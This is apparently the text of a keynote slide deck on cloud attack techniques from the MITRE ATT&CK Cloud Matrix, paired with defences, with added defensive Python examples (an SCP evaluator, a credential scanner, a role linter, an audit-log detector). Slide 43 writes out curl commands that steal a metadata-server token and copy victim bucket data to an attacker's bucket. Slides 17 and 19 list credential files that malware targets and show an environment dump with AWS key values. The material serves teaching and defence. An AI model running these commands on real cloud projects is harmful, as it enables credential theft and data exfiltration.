Organizations are moving data and applications into public cloud services at a rapid pace. As the public cloud footprint expands, red teams and attackers are reinventing the kill chain in the cloud. Public cloud services provide new, creative ways to discover assets, compromise credentials, move laterally, and exfiltrate data. In this keynote, we explore common techniques from the MITRE ATT&CK Cloud Matrix. For each technique, attendees will analyze misconfigurations, exploitation paths, and common architecture patterns for breaking the kill chain.
7. Cloud Infrastructure Discovery
MITRE ATT&CK T1580: Discovering infrastructure and resources misconfigured for public cloud access:
• Storage buckets
• Big data sets / databases
• Container image repositories
• Secrets and cryptographic keys
• Virtual machine image or database snapshots
8. AWS Publicly Exposable Resources
AWS Exposable Resources, by Scott Piper, contains a list of non-VPC bound AWS resources that can also be exposed publicly:
• S3 Bucket ACLs and public bucket policy
• EBS Volume Snapshots shared publicly
• EC2 Amazon Machine Images shared publicly
• ECR container image public repositories
• RDS Database and Cluster Snapshots
• SQS Queue public policy
• SNS notification topics public policy
• Lambda function URLs provide a dedicated HTTPS endpoint
• More at https://github.com/SummitRoute/aws_exposable_resources
9. BigQuery Public Datasets
BigQuery Datasets support sharing with allUsers and external cloud identity accounts:
10. Azure Virtual Machines Disk Snapshots
• Sharable with other users in the AD tenant
• Supports direct downloads using SAS tokens
• Provides a non-VNet bound way to exfiltrate snapshots
11. Breaking The Kill Chain: MITRE ATT&CK T1580
Defending against resource misconfiguration starts with applying detective and preventative policies in the resource hierarchy:
• Service Control Policy (SCP) (AWS)
• Azure Policy (Azure)
• Organization Policy (GCP)
12. Breaking The Kill Chain: Cloud Resource Hierarchy
Service Control Policy (SCP) documents can attach to the root, OU, and account level nodes in the AWS organization:
13. Breaking The Kill Chain: Service Control Policies
Example SCPs blocking API calls to modify public S3 and Lambda function URL configurations:
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Action": [
        "s3:PutAccountPublicAccessBlock"
      ],
      "Resource": "*",
      "Effect": "Deny"
    }
  ]
}

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Action": [
        "lambda:CreateFunctionUrlConfig",
        "lambda:UpdateFunctionUrlConfig"
      ],
      "Resource": "arn:aws:lambda:*:*:function/*",
      "Effect": "Deny",
      "Condition": {
        "StringNotEquals": {
          "lambda:FunctionUrlAuthType": "AWS_IAM"
        }
      }
    }
  ]
}
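An added example, not from the deck: a small Python evaluator that applies these two SCPs to sample requests, showing that the Lambda statement denies a function URL with any auth type other than AWS_IAM (including a request that omits the key) while leaving other Lambda actions alone; the request ARNs and contexts are constructed and only the String condition operators are modelled.

```python
import fnmatch
# The two SCPs from the slide, as Python dicts.
SCP_S3_BLOCK = {
    "Version": "2012-10-17",
    "Statement": [{"Action": ["s3:PutAccountPublicAccessBlock"],
                   "Resource": "*", "Effect": "Deny"}],
}
SCP_LAMBDA_URL = {
    "Version": "2012-10-17",
    "Statement": [{
        "Action": ["lambda:CreateFunctionUrlConfig", "lambda:UpdateFunctionUrlConfig"],
        "Resource": "arn:aws:lambda:*:*:function/*",
        "Effect": "Deny",
        "Condition": {"StringNotEquals": {"lambda:FunctionUrlAuthType": "AWS_IAM"}},
    }],
}

def _as_list(value):
    return value if isinstance(value, list) else [value]

def _condition_matches(condition, context):
    """Only StringEquals / StringNotEquals are modelled. As in IAM, a negated
    operator matches when the key is absent, so a request that omits
    FunctionUrlAuthType is still denied."""
    for operator, pairs in condition.items():
        for key, expected in pairs.items():
            actual = context.get(key)
            if operator == "StringEquals":
                if actual is None or actual not in _as_list(expected):
                    return False
            elif operator == "StringNotEquals":
                if actual is not None and actual in _as_list(expected):
                    return False
            else:
                raise ValueError(f"operator not modelled: {operator}")
    return True

def scp_denies(scp, action, resource, context=None):
    """True if any Deny statement matches; '*' wildcards are matched with fnmatch."""
    context = context or {}
    for stmt in scp["Statement"]:
        if stmt["Effect"] != "Deny":
            continue
        if not any(fnmatch.fnmatchcase(action, a) for a in _as_list(stmt["Action"])):
            continue
        if not any(fnmatch.fnmatchcase(resource, r) for r in _as_list(stmt["Resource"])):
            continue
        if _condition_matches(stmt.get("Condition", {}), context):
            return True
    return False
```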
15. Unsecured Credentials
MITRE ATT&CK T1522: Discovering insecurely stored IAM and service account credentials:
Unsecured credential locations:
• Bash history
• Configuration files
• Source code
• Version control
• Instance Metadata Service
• Environment variables
16. Cloud Credential Types
Attackers target credentials that map to many different resource types across the cloud providers:
• IAM Users & Roles (AWS IAM)
• Service Principal & Managed Identity (Azure AD)
• Service Accounts (Cloud Identity)
17. Configuration File Credentials
Cloud-focused malware (e.g., TeamTNT) will focus on common locations with cleartext credentials:
• ~/.aws/credentials
• ~/.azure/accessTokens.json
• ~/.config/gcloud/*credential*
• ~/.ssh/*
18. Version Control and Package Managers
• Node Package Manager
  • Scanned by Aidan Steele in October 2021
  • Identifies 117 valid API keys, including 30 AWS root access keys
  • https://sec549.com/id259
• Python Package Index (PyPI)
  • Scanned by Tom Forbes in January 2023
  • Identifies 57 valid AWS API keys, including 11 AWS root access keys
  • https://sec549.com/id260
19. Environment Variable Credentials
env | grep 'AWS'
AWS_LAMBDA_FUNCTION_VERSION=$LATEST
AWS_SESSION_TOKEN=IQoJb3JpZu2DaXVzLWVhc3Q...4pg9g==
AWS_LAMBDA_LOG_GROUP_NAME=/aws/lambda/serverlessprey-panther
AWS_LAMBDA_LOG_STREAM_NAME=2020/01/05/[$LATEST]786a6193a27eb390c0a
AWS_DEFAULT_REGION=us-east-1
AWS_SECRET_ACCESS_KEY=aEWSwA8k/U7IY38JetxQDZ9voUG
AWS_ACCESS_KEY_ID=ASIA54BL6EJRTTJ4SS7A
• Continuous Integration pipelines, containers, and functions often have secrets stored in environment variables
• Local File Inclusion (LFI) and Command Injection vulnerabilities can allow attackers to exfiltrate environment variables
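An added example, not from the deck: a Python scanner for the credential locations the previous slides list (configuration files, package contents, environment dumps) that reports findings with the secret redacted, so it can run in CI or over a package tarball before publication; the patterns and sample inputs are constructed, and the AWS values are the placeholders AWS uses in its own documentation.

```python
import re

# Patterns for credential material found in config files, env dumps and
# package tarballs. Only the AWS access key ID has a stable format
# (AKIA/ASIA plus 16 characters); the others are keyed on their field name.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\b((?:AKIA|ASIA)[A-Z0-9]{16})\b"),
    "aws_secret_access_key": re.compile(
        r"(?i)aws_secret_access_key\s*[=:]\s*[\"']?([A-Za-z0-9/+=]{40})"),
    "gcp_service_account_key": re.compile(
        r'"private_key"\s*:\s*"(-----BEGIN PRIVATE KEY-----)'),
    "azure_access_token": re.compile(r'"accessToken"\s*:\s*"(eyJ[A-Za-z0-9_.-]{20,})'),
}

def redact(secret):
    """Keep enough of the value to correlate a finding, never the whole secret."""
    return secret[:4] + "..." + secret[-4:] if len(secret) > 12 else "***"

def scan_text(text, source="<text>"):
    """Return one finding per pattern hit: source, line number, type, redacted value."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, pattern in PATTERNS.items():
            for match in pattern.finditer(line):
                findings.append({"source": source, "line": lineno,
                                 "type": kind, "value": redact(match.group(1))})
    return findings

# Constructed samples, not real credentials: the AWS values are the
# placeholders AWS uses in its own documentation.
SAMPLE_AWS_CREDENTIALS = """[default]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
"""
SAMPLE_ENV = "AWS_DEFAULT_REGION=us-east-1\nAWS_ACCESS_KEY_ID=ASIA000000000EXAMPLE\n"
SAMPLE_GCLOUD_KEY = '{"type": "service_account", "private_key": "-----BEGIN PRIVATE KEY-----\\nMIIE...redacted"}'

if __name__ == "__main__":
    for src, text in [("~/.aws/credentials", SAMPLE_AWS_CREDENTIALS), ("env", SAMPLE_ENV),
                      ("~/.config/gcloud/key.json", SAMPLE_GCLOUD_KEY)]:
        for f in scan_text(text, src):
            print(f"{f['source']}:{f['line']} {f['type']} {f['value']}")
```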
27. Network Service Discovery
MITRE ATT&CK T1046: Enumerating resources with public IP addresses in the victim's cloud account:
• VPC-bound resource types include:
  • Virtual machines, load balancers, containers, datastores, Redis clusters, data lakes
• Public cloud IP address blocks are well known
• Large scale cloud network service discovery (e.g., Shodan, Nmap)
  • Cloud Scanning For Vulnerability Discovery by @joswr1ght
  • https://sec510.com/1042
• Identify remotely exploitable hosts and software
28. AWS Default Virtual Machine Security Group
EC2 instances created in the AWS Web Console auto-generate a new security group with default open admin access:
• Linux VMs auto-populate open SSH access
• Windows VMs auto-populate open RDP access
29. Azure Default Virtual Machine Network Access
Azure Virtual Machines created in the UI default to open admin access:
• Linux VMs auto-populate open SSH access
• Windows VMs auto-populate RDP access
35. Breaking The Kill Chain: Centralized Resource Configurations
Centralizing network resources into the network host account provides a single pane of glass for public connectivity:
Figure: Public Inventory
38. Transfer Data to the Attacker's Cloud Account
MITRE ATT&CK T1537: Exfiltrating data from the victim's cloud account by escalating privileges and transferring data on the cloud provider's backbone network to avoid network-based detection:
• Compromising over-permissioned service accounts
• Impersonating a target service account
• Transferring data across the cloud provider's backbone network
• Pivoting with stolen credentials
39. Privilege Escalation: Azure Overly Scoped Role Definition
Example role definition allowing excessive permissions and overly scoped access to resources (subscription-wide scope to all storage accounts):
{
  "assignableScopes": [ "/subscriptions/${var.subscription_id}" ],
  "permissions": [
    {
      "actions": [
        "Microsoft.Storage/storageAccounts/listKeys/action",
        "Microsoft.Storage/storageAccounts/ListAccountSas/action",
        "Microsoft.Storage/storageAccounts/read"
      ]
    }
  ],
  "roleName": "Storage Access"
}
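An added example, not from the deck: a Python linter for Azure custom role definitions that flags the pattern above, subscription-wide assignableScopes combined with key-issuing actions, so a definition like this is caught in code review before it is deployed; the high-risk action list and the hardened comparison role are my assumptions.

```python
import re

# Actions that issue data-plane credentials or grant new access. Carrying
# these at subscription scope is the pattern in the role definition above.
HIGH_RISK_ACTIONS = {a.lower() for a in [
    "Microsoft.Storage/storageAccounts/listKeys/action",
    "Microsoft.Storage/storageAccounts/ListAccountSas/action",
    "Microsoft.Authorization/roleAssignments/write",
    "Microsoft.Authorization/roleDefinitions/write",
]}
# Root, subscription, or management-group scope; resource-group scope does not match.
BROAD_SCOPE = re.compile(r"^(/|/subscriptions/[^/]+/?|/providers/Microsoft\.Management/managementGroups/.*)$")

def lint_role_definition(role):
    """Return human-readable findings for an Azure custom role definition."""
    findings = []
    broad = [s for s in role.get("assignableScopes", []) if BROAD_SCOPE.match(s)]
    actions = [a for p in role.get("permissions", []) for a in p.get("actions", [])]
    wildcards = [a for a in actions if a.endswith("*")]
    risky = sorted(a for a in actions if a.lower() in HIGH_RISK_ACTIONS)
    if broad:
        findings.append(f"assignable at broad scope: {', '.join(broad)}")
    if wildcards:
        findings.append(f"wildcard actions: {', '.join(wildcards)}")
    if risky:
        findings.append(f"credential-issuing or access-granting actions: {', '.join(risky)}")
    if broad and (risky or wildcards):
        findings.append("broad scope combined with high-risk actions: every matching resource "
                        "under the scope is reachable by any assignee")
    return findings

# The over-scoped role from the slide.
OVERLY_SCOPED_ROLE = {
    "assignableScopes": ["/subscriptions/${var.subscription_id}"],
    "permissions": [{"actions": [
        "Microsoft.Storage/storageAccounts/listKeys/action",
        "Microsoft.Storage/storageAccounts/ListAccountSas/action",
        "Microsoft.Storage/storageAccounts/read"]}],
    "roleName": "Storage Access",
}
# Constructed hardened variant: one resource group, read-only actions.
SCOPED_READ_ROLE = {
    "assignableScopes": ["/subscriptions/${var.subscription_id}/resourceGroups/rg-app-data"],
    "permissions": [{"actions": ["Microsoft.Storage/storageAccounts/read",
                                 "Microsoft.Storage/storageAccounts/blobServices/containers/read"]}],
    "roleName": "Storage Reader (rg-app-data)",
}
```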
40. Privilege Escalation: Google Cloud's Primitive Editor Role
Google Cloud's Primitive Editor role has permission to view, modify, and delete existing project resources (with a few exceptions):
• Default role assigned to Compute instances, App Engine services, and Cloud Functions
• Too permissive for what your workload needs in production
• Has over 4,000 assigned permissions on the project
• Attackers compromising workloads with Editor permissions can access data across the project
41. Privilege Escalation: Transitive Permission Assignment
Transitive privilege escalation occurs by creating a resource that inherits permissions from a supplied service account:
• AWS: iam:PassRole permission
• GCP: iam.serviceAccounts.actAs permission
Escalation path shown on the slide: Create a Compute instance → Configure Compute to run as the target service account → Obtain token through the Instance Metadata Server (IMDS) → Impersonate privileged service account in project
42. Data Exfiltration: Transferring Data Cross Tenant
Attackers leverage private service access (private link) to exfiltrate data across the cloud provider's backbone network:
• Private link services are designed to help customers keep data from traversing the Internet
• Default policy (AWS, GCP) allows multi-tenant access to the cloud provider APIs
• May allow data to move cross-tenant between resources without network and firewall inspection
43. Data Exfiltration: Stolen Credential Pivoting
Exfiltrating data from the victim's Google Cloud project using the stolen credential:
export BEARER_TOKEN=$(curl -s -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token | jq -r .access_token)
# List all storage buckets in the victim's project
curl -s -H "Authorization: Bearer $BEARER_TOKEN" \
  "https://storage.googleapis.com/storage/v1/b?project=victims-project"
# Copy objects from the victim's bucket
curl -s -X POST -H "Authorization: Bearer $BEARER_TOKEN" \
  https://storage.googleapis.com/storage/v1/b/victims-bucket/o/data.pdf/copyTo/b/attackers-bucket/o/data.pdf
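An added defender-side example, not from the deck: a Python check over constructed GCP Data Access audit log fields that flags a service account's credentials being used from outside the networks the workload runs in, which is the trace the pivot above leaves in the victim project (the bucket listing and the object read behind the copy); the field subset, IP ranges and log entries are constructed, and caller values that are not IP literals are skipped as an assumption.

```python
import ipaddress

# Networks the workload's service account is expected to call from: the VPC
# range plus the office egress range. Constructed for this example.
EXPECTED_CALLER_RANGES = [ipaddress.ip_network("10.128.0.0/9"),
                          ipaddress.ip_network("203.0.113.0/24")]

# Constructed entries reduced to the protoPayload fields the check needs
# (methodName, authenticationInfo.principalEmail, requestMetadata.callerIp,
# resourceName). The third entry is the object read behind a cross-project copy.
CONSTRUCTED_LOG = [
    {"methodName": "storage.objects.list", "principalEmail": "app@victims-project.iam.gserviceaccount.com",
     "callerIp": "10.128.0.7", "resourceName": "projects/_/buckets/victims-bucket"},
    {"methodName": "storage.buckets.list", "principalEmail": "app@victims-project.iam.gserviceaccount.com",
     "callerIp": "198.51.100.23", "resourceName": "projects/victims-project"},
    {"methodName": "storage.objects.get", "principalEmail": "app@victims-project.iam.gserviceaccount.com",
     "callerIp": "198.51.100.23", "resourceName": "projects/_/buckets/victims-bucket/objects/data.pdf"},
    {"methodName": "storage.objects.get", "principalEmail": "alice@example.com",
     "callerIp": "203.0.113.9", "resourceName": "projects/_/buckets/victims-bucket/objects/report.csv"},
]

def is_service_account(principal):
    return principal.endswith(".iam.gserviceaccount.com")

def detect_credential_pivot(entries, ranges=EXPECTED_CALLER_RANGES):
    """Group service-account calls made from outside the expected ranges by principal.
    Human users are skipped (they legitimately roam); caller values that are not
    IP literals are skipped too, an assumption for this example."""
    hits = {}
    for entry in entries:
        if not is_service_account(entry["principalEmail"]):
            continue
        try:
            addr = ipaddress.ip_address(entry["callerIp"])
        except ValueError:
            continue
        if any(addr in net for net in ranges):
            continue
        hits.setdefault(entry["principalEmail"], []).append(
            (entry["methodName"], entry["callerIp"], entry["resourceName"]))
    return hits

if __name__ == "__main__":
    for principal, calls in detect_credential_pivot(CONSTRUCTED_LOG).items():
        print(f"{principal}: {len(calls)} call(s) from outside expected ranges")
        for method, ip, resource in calls:
            print(f"  {method} from {ip} on {resource}")
```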
44. Breaking The Kill Chain: MITRE ATT&CK T1537
Defending against privilege escalation and data exfiltration requires additional cloud-native controls to prevent data from leaving the organization's tenant:
• IAM Access Analyzer, IAM Recommender (AWS / GCP)
• Private Link Services, Network Access Rules (AWS / Azure)
• VPC Service Controls (Google Cloud)
45. Breaking The Kill Chain: IAM Recommender
Reviewing IAM Recommender reports and reducing excessive permissions:
46. Breaking The Kill Chain: Service Endpoint Configuration
Preventing data exfiltration with private link services and network access policy:
47. Breaking The Kill Chain: VPC Service Controls
Configuring a VPC Service Controls perimeter to prevent data exfiltration:
• Perimeter includes the authorized projects
• In-scope services include the GCS storage service
• Unauthorized projects and external clients cannot interact with the target GCS bucket
49. Closing Remarks
Breaking The Cloud Kill Chain requires an in-depth understanding of cloud-native services and configurations:
• Resources can be made public too easily: build guardrails with the policy hierarchy
• Credential management continues to be a problem: move to workload identity federation
• Cloud resources are Internet exposed too easily: central network inspection is critical
• New ways to hide & exfiltrate data exist: focus on building network identity perimeters